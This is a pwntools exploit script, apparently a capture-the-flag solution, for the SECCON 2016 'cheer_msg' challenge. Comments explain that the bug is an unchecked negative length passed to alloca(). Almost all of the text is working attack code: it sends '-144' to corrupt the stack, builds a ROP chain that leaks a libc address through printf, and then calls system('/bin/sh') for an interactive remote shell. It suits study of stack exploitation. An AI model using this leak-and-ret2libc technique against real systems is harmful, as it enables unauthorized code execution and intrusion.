요약: alloca 에 음수줘서 stack 해꼬질함.
summary: negative index to alloca() and fuckup the stack.
from pwn import *
# Exploit script for the SECCON 2016 "cheer_msg" challenge (Python 2 / pwntools).
# Root cause per the summary above: the length read from the user is passed to
# alloca() without a sign/range check, so a negative value moves the stack
# pointer the wrong way. The fix on the program side is to reject lengths
# that are negative or larger than the buffer before the allocation.
context.arch = 'i386' # i386 / arm   # makes pack() emit 4-byte little-endian values
# recvuntil sendline, pack, recv, send
r = remote('cheermsg.pwn.seccon.jp', 30527)   # challenge server used for the writeup
#r = process(['./cheer_msg'])                   # local binary alternative (commented out)
raw_input('attach')   # pause until Enter; the prompt text suggests a debugger is attached here
# start pwn.
print r.recvuntil('Message Length >> ')
r.sendline('-144')   # the negative length that reaches alloca() (see summary)
print r.recvuntil('Name >> ')
# ROP start!
# Hard-coded addresses for this binary; none of them is derived on the page,
# so the names are the only hint to their role (pr presumably a gadget,
# got presumably a GOT slot, printf/main entry points) — confirm against the binary.
pr = 0x80487af
got = 0x804a00c
printf = 0x8048430
main = 0x80485ca
system = 0   # filled in after the leak (stage 2)
binsh = 0    # filled in after the leak (stage 2)
# Stage 1 chain, in order: printf, pr, got, main.
payload = ''
payload += pack(printf)
payload += pack(pr)
payload += pack(got)
payload += pack(main)
r.sendline(payload)
sleep(1)   # give the server time to print before reading the whole response
leak = r.recv(8192)
print leak.encode('hex')   # hex dump of the raw response for debugging
# Take the 4 bytes after ': \n', reverse them (little-endian) and read as an int.
# The variable name says this is setbuf's address; the page does not show
# which symbol the slot at 0x804a00c belongs to, so verify that assumption.
setbuf = int(leak.split(': \n')[1][:4][::-1].encode('hex'), 16)
print hex(setbuf)
raw_input('leak ok?')   # manual checkpoint before stage 2
# Offsets from the leaked address to system and to the "/bin/sh" string.
# They are specific to one libc build (server vs. local variants below),
# which is why the script carries both sets and only one is active.
system_offset = -0x27810 # server
#system_offset = -0x27800 # local
binsh_offset = +0xf8d2c # server
#binsh_offset = +0xf9094 # local
# stage2.
#print r.recvuntil('Message Length >> ')   # prompt is not read here; -144 is sent straight away
r.sendline('-144')   # same negative length as stage 1
print r.recvuntil('Name >> ')
# ROP start!
system = setbuf + system_offset
binsh = setbuf + binsh_offset
# Stage 2 chain, in order: system, 0, binsh.
payload = pack(system)
payload += pack(0)
payload += pack(binsh)
r.sendline(payload)
# get shell?
r.interactive()   # hand the connection over to the user